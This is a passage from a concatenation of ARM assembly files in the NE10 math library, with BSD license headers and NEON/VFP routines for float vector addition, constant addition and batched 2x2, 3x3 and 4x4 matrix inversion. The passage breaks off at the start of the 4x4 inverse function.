@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_identitymat.asm.s
@
|
open-vela/external_Ne10 | 3,210 | modules/math/NE10_add.asm.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_add.asm.s
@
.text
.syntax unified
.include "NE10header.s"
.balign 4
.global ne10_add_float_asm
.thumb
.thumb_func
ne10_add_float_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_add_float(arm_vec2f_t * dst,
@ arm_float_t * src1, const arm_float_t * src2,
@ unsigned int count)
@
@ r0: *dst & current src1 entry's address - made of base(r0)+offset(r5)
@ r1: *src1 & current src1 entry's address - made of base(r1)+offset(r5)
@ r2: *src2 & current src2 entry's address - made of base(r2)+offset(r5)
@ r3: int count
@
@ r3: loop counter
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
cbz r3, .LoopEndFloat
.LoopBeginFloat:
vldr s1, [r1] @ Load s1 = src1[i]
add r1, r1, #4 @ move to the next entry
vldr s2, [r2] @ Load s2 = src2[i]
add r2, r2, #4 @ next entry
vadd.f32 s10, s1, s2 @ s10 = src1[i] * src2[i]
vstr s10, [r0] @ Store the result back into the main memory
add r0, r0, #4 @ next entry in the dst
subs r3, r3, #1 @ count down using the current index (i--)
bne .LoopBeginFloat @ Continue if "i < count"
.LoopEndFloat:
mov r0, NE10_OK @ Return NE10_OK
bx lr
|
open-vela/external_Ne10 | 9,792 | modules/math/NE10_addc.asm.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_addc.asm.s
@
.text
.syntax unified
.include "NE10header.s"
.balign 4
.global ne10_addc_float_asm
.thumb
.thumb_func
ne10_addc_float_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_addc_float(arm_vec2f_t * dst,
@ arm_float_t * src, const arm_float_t * cst,
@ unsigned int count)
@
@ r0: *dst
@ r1: *src
@ r2: cst
@ r3: int count
@
@ r3: loop counter
@ r5: current item's offset in both src[] and dst[]
@ r6: current source item's address made of base(r1)+offset(r5)
@ r7: current destination item's address made of base(r0)+offset(r5)
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4, r5, r6, r7}
cbz r3, .LoopEndFloat
mov r5, #0
.LoopBeginFloat:
add r6, r1, r5 @ Get current source item's address in memory
vldr s1, [r6, #0] @ Load src[i]
vmov s3, r2 @ Get cst into register s3
vadd.f32 s10, s1, s3 @ s10 = src[i] + cst
add r7, r0, r5 @ Get current destination item's address in memory
vstr s10, [r7, #0] @ Store the result back into the main memory
add r5, r5, #4 @ increase the offset by 1*sizeof(float) @@ (for x and y)
subs r3, r3, #1 @ count down using the current index (i--)
bne .LoopBeginFloat @ Continue if "i < count"
.LoopEndFloat:
mov r0, NE10_OK @ Return NE10_OK
pop {r4, r5, r6, r7}
bx lr
.balign 4
.global ne10_addc_vec2f_asm
.thumb
.thumb_func
ne10_addc_vec2f_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_addc_vec2f(arm_vec2f_t * dst,
@ arm_vec2f_t * src, const arm_vec2f_t * cst,
@ unsigned int count)
@
@ r0: *dst
@ r1: *src
@ r2: *cst
@ r3: int count
@
@ r3: loop counter
@ r5: current item's offset in both src[] and dst[]
@ r6: current source item's address made of base(r1)+offset(r5)
@ r7: current destination item's address made of base(r0)+offset(r5)
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4, r5, r6, r7}
cbz r3, .LoopEndVec2F
mov r5, #0
.LoopBeginVec2F:
add r6, r1, r5 @ Get current source item's address in memory
vldr s1, [r6, #0] @ Load src[i].x and src[i].y
vldr s2, [r6, #4]
vldr s3, [r2, #0] @ Load cst->x and cst->y
vldr s4, [r2, #4]
vadd.f32 s10, s1, s3 @ s10 = src[i].x + cst->x
vadd.f32 s11, s2, s4 @ s11 = src[i].y + cst->y
add r7, r0, r5 @ Get current destination item's address in memory
vstr s10, [r7, #0] @ Store the results back into the main memory
vstr s11, [r7, #4]
add r5, r5, #8 @ increase the offset by 2*sizeof(float) @@ (for x and y)
subs r3, r3, #1 @ count down using the current index (i--)
bne .LoopBeginVec2F @ Continue if "i < count"
.LoopEndVec2F:
mov r0, NE10_OK @ Return NE10_OK
pop {r4, r5, r6, r7}
bx lr
.balign 4
.global ne10_addc_vec3f_asm
.thumb
.thumb_func
ne10_addc_vec3f_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_addc_vec3f(arm_vec3f_t * dst,
@ arm_vec3f_t * src, const arm_vec3f_t * cst,
@ unsigned int count)
@
@ r0: *dst
@ r1: *src
@ r2: *cst
@ r3: int count
@
@ r3: loop counter
@ r5: current item's offset in both src[] and dst[]
@ r6: current source item's address made of base(r1)+offset(r5)
@ r7: current destination item's address made of base(r0)+offset(r5)
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4, r5, r6, r7}
cbz r3, .LoopEndVec3F
mov r5, #0
.LoopBeginVec3F:
add r6, r1, r5 @ Get current source item's address in memory
vldr s1, [r6, #0] @ Load src[i].x, src[i].y , and src[i].z
vldr s2, [r6, #4]
vldr s3, [r6, #8]
vldr s4, [r2, #0] @ Load cst->x, cst->y, and cst->z
vldr s5, [r2, #4]
vldr s6, [r2, #8]
vadd.f32 s10, s1, s4 @ s10 = src[i].x + cst->x
vadd.f32 s11, s2, s5 @ s11 = src[i].y + cst->y
vadd.f32 s12, s3, s6 @ s12 = src[i].z + cst->z
add r7, r0, r5 @ Get current destination item's address in memory
vstr s10, [r7, #0] @ Store the results back into the main memory
vstr s11, [r7, #4]
vstr s12, [r7, #8]
add r5, r5, #12 @ increase the offset by 3*sizeof(float) @@ (for x, y, and z)
subs r3, r3, #1 @ count down using the current index (i--)
bne .LoopBeginVec3F @ Continue if "i < count"
.LoopEndVec3F:
mov r0, NE10_OK @ Return NE10_OK
pop {r4, r5, r6, r7}
bx lr
.balign 4
.global ne10_addc_vec4f_asm
.thumb
.thumb_func
ne10_addc_vec4f_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_addc_vec4f(arm_vec4f_t * dst,
@ arm_vec4f_t * src, const arm_vec4f_t * cst,
@ unsigned int count)
@
@ r0: *dst
@ r1: *src
@ r2: *cst
@ r3: int count
@
@ r3: loop counter
@ r5: current item's offset in both src[] and dst[]
@ r6: current source item's address made of base(r1)+offset(r5)
@ r7: current destination item's address made of base(r0)+offset(r5)
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4, r5, r6, r7}
cbz r3, .LoopEndVec4F
mov r5, #0
.LoopBeginVec4F:
add r6, r1, r5 @ Get current source item's address in memory
vldr s1, [r6, #0] @ Load src[i].x, src[i].y , src[i].z, and w
vldr s2, [r6, #4]
vldr s3, [r6, #8]
vldr s4, [r6, #12]
vldr s5, [r2, #0] @ Load cst->x, cst->y, cst->z, and w
vldr s6, [r2, #4]
vldr s7, [r2, #8]
vldr s8, [r2, #12]
vadd.f32 s10, s1, s5 @ s10 = src[i].x + cst->x
vadd.f32 s11, s2, s6 @ s11 = src[i].y + cst->y
vadd.f32 s12, s3, s7 @ s12 = src[i].z + cst->z
vadd.f32 s13, s4, s8 @ s13 = src[i].w + cst->w
add r7, r0, r5 @ Get current destination item's address in memory
vstr s10, [r7, #0] @ Store the results back into the main memory
vstr s11, [r7, #4]
vstr s12, [r7, #8]
vstr s13, [r7, #12]
add r5, r5, #16 @ increase the offset by 4*sizeof(float) @@ (for x, y, z, and w)
subs r3, r3, #1 @ count down using the current index (i--)
bne .LoopBeginVec4F @ Continue if "i < count"
.LoopEndVec4F:
mov r0, NE10_OK @ Return NE10_OK
pop {r4, r5, r6, r7}
bx lr
|
open-vela/external_Ne10 | 22,395 | modules/math/NE10_invmat.neon.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_invmat.neon.s
@
.text
.syntax unified
.include "NE10header.s"
.include "NE10_detmat.neon.inc.s"
CONST_FLOAT_ONE:
.word 0x3f800000 @ This is the hex value for 1.0f in IEEE-754
.word 0x3f800000
.word 0x3f800000
.word 0x3f800000
CONST_FLOAT_1Em12:
.word 0x2B8CBCCC @ This is the hex representation of 1.0e-12 in IEEE-754
.word 0x2B8CBCCC @ Any determinant smaller than this value is
.word 0x2B8CBCCC @ considered near zero and refused for
.word 0x2B8CBCCC @ calculating the inverse of a matrix.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ This macro calculates the inverse of four 2x2 matrices.
@ It reads in the matrices from registers q8-q11 and returns
@ its results in registers q12-q15
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.macro GET_INVERSE_2x2MATS
@ get the determinant of these four matrices in q15
vmul.f32 q15, q8, q11
vmls.f32 q15, q9, q10
@ compare them to find the ones that are too small and set those to 1.0f
vacge.f32 q14, q15, q0 @ dst = q14
vand.f32 q13, q14, q15 @ tmp = q13
vbic.s32 q14, q1, q14 @ NOTE: This must be of type S32, the type F32 only negates the sign bits
vorr.f32 q14, q14, q13 @ at this point q14 lanes that are too small are set to one and the rest are the determinants
@ q15 = 1.0f / q14
vrecpe.f32 q15, q14
vrecps.f32 q14, q15, q14
vmul.f32 q14, q14, q15
@ now multiply all the entries with q14 = { 1/det(M1-M4) )
vmul.f32 q12, q11, q14
vmul.f32 q15, q8, q14
vneg.f32 q14, q14
vmul.f32 q13, q9, q14
vmul.f32 q14, q10, q14
.endm
.align 4
.global ne10_invmat_2x2f_neon
.thumb
.thumb_func
ne10_invmat_2x2f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_invmat_2x2f(arm_mat2x2f_t * dst,
@ arm_mat2x2f_t * src,
@ unsigned int count)
@
@ r0: *dst & current dst entry's address
@ r1: *src1 & current src1 entry's address
@ r2: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@
@ r3: the number of items that are left to be processed at the end of
@ the input array
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4}
adr r4, CONST_FLOAT_1Em12
vld1.32 {q0}, [r4]
adr r4, CONST_FLOAT_ONE
vld1.32 {q1}, [r4]
and r3, r2, #3 @ r3 = count % 4;
sub r2, r2, r3 @ count = count - r2; This is what's left to be processed after this loop
cmp r2, #0
beq .L_check_mat2x2
@ We load four 2x2 matrices each time, inverse them using the
@ provided macro above, and store the four resulting matrices
@ back into the memory location pointed to by the first parameter dst (r0)
@ load the 1st set of values
vld4.32 {d16, d18, d20, d22}, [r1]!
vld4.32 {d17, d19, d21, d23}, [r1]!
subs r2, r2, #4 @ 4 for this set
@ calculate values for the 1st set
GET_INVERSE_2x2MATS
ble .L_mainloopend_mat2x2
.L_mainloop_mat2x2:
@ store the result for the current set
vst4.32 {d24, d26, d28, d30}, [r0]!
vst4.32 {d25, d27, d29, d31}, [r0]!
@ load the next set of values
vld4.32 {d16, d18, d20, d22}, [r1]!
vld4.32 {d17, d19, d21, d23}, [r1]!
subs r2, r2, #4
@ calculate values for the next set
GET_INVERSE_2x2MATS
bgt .L_mainloop_mat2x2 @ loop if r2 > 0, if we have at least another 4 vectors (8 floats) to process
.L_mainloopend_mat2x2:
@ the last iteration for this call
@ store the result for the last set
vst4.32 {d24, d26, d28, d30}, [r0]!
vst4.32 {d25, d27, d29, d31}, [r0]!
.L_check_mat2x2:
@ check if anything left to process at the end of the input array
cmp r3, #0
ble .L_return_mat2x2
.L_secondloop_mat2x2:
@ process the last few items left in the input array
vld4.32 {d16[0], d18[0], d20[0], d22[0]}, [r1]!
subs r3, r3, #1
@ calculate values
GET_INVERSE_2x2MATS
@ store the results
vst4.32 {d24[0], d26[0], d28[0], d30[0]}, [r0]!
bgt .L_secondloop_mat2x2
.L_return_mat2x2:
@ return
pop {r4}
mov r0, #0
bx lr
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ This macro calculates the inverse of two 3x3 matrices.
@ It reads in the matrices from registers q0-q5 and returns
@ its results in registers q10-q15.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.macro GET_INVERSE_3x3MATS
@ get the determinant of these two matrices in q15
GET_DETERMINANT_of_3x3MATS_ARGS d0, d2, d4, d6, d8, d10, d1, d3, d5, d16, d9, d11 @ stores the results in d16
@ compare them to find the ones that are too small and set those to 1.0f
vacge.f32 d9, d16, d12 @ dst = d9 - the lanes that are too small are set to all (0)b
vand.f32 d11, d9, d16 @ tmp = d11
vbic.s32 d9, d14, d9 @ NOTE: This must be of type S32, the type F32 only negates the sign bits
vorr.f32 d9, d9, d11 @ at this point d9 lanes that are too small are set to one and the rest are the determinants
@ d16 = 1.0f / d9
vrecpe.f32 d16, d9
vrecps.f32 d9, d16, d9
vmul.f32 d16, d9, d16
vmov.f32 d17, d16 @ So q8 = { d16={1/det(M1), 1/det(M2)}, d17={1/det(M1), 1/det(M2)} }
@ get the coefficients in q10 to q15
GET_DET_2x2MATS_ARGS d8, d10, d3, d5, d20
GET_NEG_DET_2x2MATS_ARGS d6, d10, d1, d5, d26
GET_DET_2x2MATS_ARGS d6, d8, d1, d3, d21
GET_NEG_DET_2x2MATS_ARGS d2, d4, d3, d5, d22
GET_DET_2x2MATS_ARGS d0, d4, d1, d5, d28
GET_NEG_DET_2x2MATS_ARGS d0, d2, d1, d3, d23
GET_DET_2x2MATS_ARGS d2, d4, d8, d10, d24
GET_NEG_DET_2x2MATS_ARGS d0, d4, d6, d10, d30
GET_DET_2x2MATS_ARGS d0, d2, d6, d8, d25
@ now multiply all the entries with q8 = { d16={1/det(M1), 1/det(M2)}, d17={1/det(M1), 1/det(M2)} }
vmul.f32 q10, q10, q8
vmul.f32 q11, q11, q8
vmul.f32 q12, q12, q8
vmul.f32 q13, q13, q8
vmul.f32 q14, q14, q8
vmul.f32 q15, q15, q8
.endm
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ This macro stores two 3x3 matrices returned by the above macro
@ GET_INVERSE_3x3MATS from registers q10-q15 and into the memory
@ address pointed to by the register r0 (dst)
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.macro STORE_3x3INVMATS
@ rearrange the results for use in a "vst3" instruction...
vtrn.32 q10, q13
vtrn.32 q11, q14
vtrn.32 q12, q15
vst3.32 { d20 , d22 , d24 }, [r0]!
vst3.32 { d21[0], d23[0], d25[0]}, [r0]!
vst3.32 { d26 , d28 , d30 }, [r0]!
vst3.32 { d27[0], d29[0], d31[0]}, [r0]!
.endm
.align 4
.global ne10_invmat_3x3f_neon
.thumb
.thumb_func
ne10_invmat_3x3f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_invmat_3x3f(arm_mat3x3f_t * dst,
@ arm_mat3x3f_t * src1,
@ arm_mat3x3f_t * src2,
@ unsigned int count)
@
@ r0: *dst & current dst entry's address
@ r1: *src1 & current src1 entry's address
@ r2: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@
@ r3: the number of items that are left to be processed at the end
@ of the input array
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4}
vpush {q4, q5, q6, q7}
adr r4, CONST_FLOAT_1Em12
vld1.32 {q6}, [r4]
adr r4, CONST_FLOAT_ONE
vld1.32 {q7}, [r4]
and r3, r2, #3 @ r2 = count % 4;
sub r2, r2, r3 @ count = count - r2; This is what's left to be processed after this loop
cmp r2, #0
beq .L_check_mat3x3
@ We load two 3x3 matrices each time, inverse them using the
@ provided macro above, and store the two resulting matrices
@ back into the memory location pointed to by the first parameter dst (r0)
@ load the 1st set of values
LOAD_3x3MATS_ARGS d0, d1, d2, d3, d4, d5, d6, d7, d8, d9, d10, d11, q0, q1, q2, q3, q4, q5, r1
subs r2, r2, #2 @ 2 for this set
@ calculate values for the 1st set
GET_INVERSE_3x3MATS
ble .L_mainloopend_mat3x3
.L_mainloop_mat3x3:
@ store the result for the current set
STORE_3x3INVMATS
@ load the next set of values
LOAD_3x3MATS_ARGS d0, d1, d2, d3, d4, d5, d6, d7, d8, d9, d10, d11, q0, q1, q2, q3, q4, q5, r1
subs r2, r2, #2
@ calculate values for the next set
GET_INVERSE_3x3MATS
bgt .L_mainloop_mat3x3 @ loop if r2 > 0, if we have at least another 4 vectors (12 floats) to process
.L_mainloopend_mat3x3:
@ the last iteration for this call
@ store the result for the last set
STORE_3x3INVMATS
.L_check_mat3x3:
@ check if anything left to process at the end of the input array
cmp r3, #0
ble .L_return_mat3x3
.L_secondloop_mat3x3:
@ process the last few items left in the input array
@ load the next (e.g. 3rd) set of values
vld3.32 { d0, d2, d4 }, [r1]!
vld3.32 { d1[0], d3[0], d5[0] }, [r1]!
vtrn.32 q0, q3
vtrn.32 q1, q4
vtrn.32 q2, q5
subs r3, r3, #1
@ calculate values for the last (e.g. 3rd) set
GET_INVERSE_3x3MATS
@ store the result for the last (e.g. 3rd) set
vtrn.32 q10, q13
vtrn.32 q11, q14
vtrn.32 q12, q15
vst3.32 { d20 , d22 , d24 }, [r0]!
vst3.32 { d21[0], d23[0], d25[0]}, [r0]!
bgt .L_secondloop_mat3x3
.L_return_mat3x3:
@ return
vpop {q4, q5, q6, q7}
pop {r4}
mov r0, #0
bx lr
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ This macro calculates the inverse of two 4x4 matrices.
@ It reads in the matrices from registers q0-q7 and returns
@ its results in registers q8-q15.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.macro GET_INVERSE_4x4MATS
vld1.32 {q10}, [r4]
vld1.32 {q11}, [r5]
@ get the determinant of these two matrices in q15
GET_DETERMINANT_of_4x4MATS_ARGS d0, d2, d4, d6, d8, d10, d12, d14, d1, d3, d5, d7, d9, d11, d13, d15, d30, d28, d26, d31, d29, d27
@ compare them to find the ones that are too small and set those to 1.0f
vacge.f32 d24, d30, d20 @ dst = d24
vand.f32 d25, d24, d30 @ tmp = d25
vbic.s32 d24, d22, d24 @ NOTE: The instruction here must be of type S32, the type F32 only negates the sign bits
vorr.f32 d24, d24, d25 @ at this point all d24 lanes that are too small are set to one and the rest are the determinants
@ d30 = 1.0f (=q1) / d24
vrecpe.f32 d30, d24
vrecps.f32 d24, d30, d24
vmul.f32 d30, d24, d30
vmov.f32 d31, d30 @ So q15 = { d30={1/det(M1), 1/det(M2)}, d31={1/det(M1), 1/det(M2)} }
@ get the coefficients
GET_DETERMINANT_of_3x3MATS_ARGS d0 , d4 , d6 , d8 , d12, d14, d1 , d5 , d7 , d18, d20, d22
GET_DETERMINANT_of_3x3MATS_ARGS d0 , d2 , d4 , d8 , d10, d12, d1 , d3 , d5 , d19, d20, d22
GET_DETERMINANT_of_3x3MATS_ARGS d10, d12, d14, d3 , d5 , d7 , d11, d13, d15, d16, d20, d22
GET_NEG_DET_3x3MATS_ARGS d8 , d12, d14, d1 , d5 , d7 , d9 , d13, d15, d24, d20, d22
GET_DETERMINANT_of_3x3MATS_ARGS d8 , d10, d14, d1 , d3 , d7 , d9 , d11, d15, d17, d20, d22
GET_NEG_DET_3x3MATS_ARGS d8 , d10, d12, d1 , d3 , d5 , d9 , d11, d13, d25, d20, d22
vpush {d16, d17, d18, d19}
GET_NEG_DET_3x3MATS_ARGS d2 , d4 , d6 , d3 , d5 , d7 , d11, d13, d15, d18, d16, d17
GET_DETERMINANT_of_3x3MATS_ARGS d0 , d4 , d6 , d1 , d5 , d7 , d9 , d13, d15, d26, d16, d17
GET_NEG_DET_3x3MATS_ARGS d0 , d2 , d6 , d1 , d3 , d7 , d9 , d11, d15, d19, d16, d17
GET_DETERMINANT_of_3x3MATS_ARGS d0 , d2 , d4 , d1 , d3 , d5 , d9 , d11, d13, d27, d16, d17
GET_DETERMINANT_of_3x3MATS_ARGS d2 , d4 , d6 , d10, d12, d14, d11, d13, d15, d20, d16, d17
GET_NEG_DET_3x3MATS_ARGS d0 , d4 , d6 , d8 , d12, d14, d9 , d13, d15, d28, d16, d17
GET_DETERMINANT_of_3x3MATS_ARGS d0 , d2 , d6 , d8 , d10, d14, d9 , d11, d15, d21, d16, d17
GET_NEG_DET_3x3MATS_ARGS d0 , d2 , d4 , d8 , d10, d12, d9 , d11, d13, d29, d16, d17
GET_NEG_DET_3x3MATS_ARGS d2 , d4 , d6 , d10, d12, d14, d3 , d5 , d7 , d22, d16, d17
@@ GET_DETERMINANT_of_3x3MATS_ARGS d0 , d4 , d6 , d8 , d12, d14, d1 , d5 , d7 , d30, d16, d17 @ This is moved to the top of this section as q15 must remain unchanged
GET_NEG_DET_3x3MATS_ARGS d0 , d2 , d6 , d8 , d10, d14, d1 , d3 , d7 , d23, d16, d17
@@ GET_DETERMINANT_of_3x3MATS_ARGS d0 , d2 , d4 , d8 , d10, d12, d1 , d3 , d5 , d31, d16, d17 @ This is moved to the top of this section as q15 must remain unchanged
vpop {d16, d17}
@ now multiply all the entries with q15 = { d30={1/det(M1), 1/det(M2)}, d31={1/det(M1), 1/det(M2)} }
vmul.f32 q11, q11, q15
vmul.f32 q10, q10, q15
vmul.f32 q9, q9, q15
vmul.f32 q8, q8, q15
vpop {d0, d1}
vmul.f32 q12, q12, q15
vmul.f32 q13, q13, q15
vmul.f32 q14, q14, q15
vmul.f32 q15, q0, q15
.endm
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ This macro stores two 4x4 matrices returned by the above macro
@ GET_INVERSE_4x4MATS from registers q8-q15 and into the memory
@ address pointed to by the register r0 (dst)
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.macro STORE_4x4INVMATS
@ rearrange the results for use in a "vst4" instruction...
vtrn.32 q8, q12
vtrn.32 q9, q13
vtrn.32 q10, q14
vtrn.32 q11, q15
vst4.32 { d16 , d18 , d20 , d22 }, [r0]!
vst4.32 { d17 , d19 , d21 , d23 }, [r0]!
vst4.32 { d24 , d26 , d28 , d30 }, [r0]!
vst4.32 { d25 , d27 , d29 , d31 }, [r0]!
.endm
.align 4
.global ne10_invmat_4x4f_neon
.thumb
.thumb_func
ne10_invmat_4x4f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
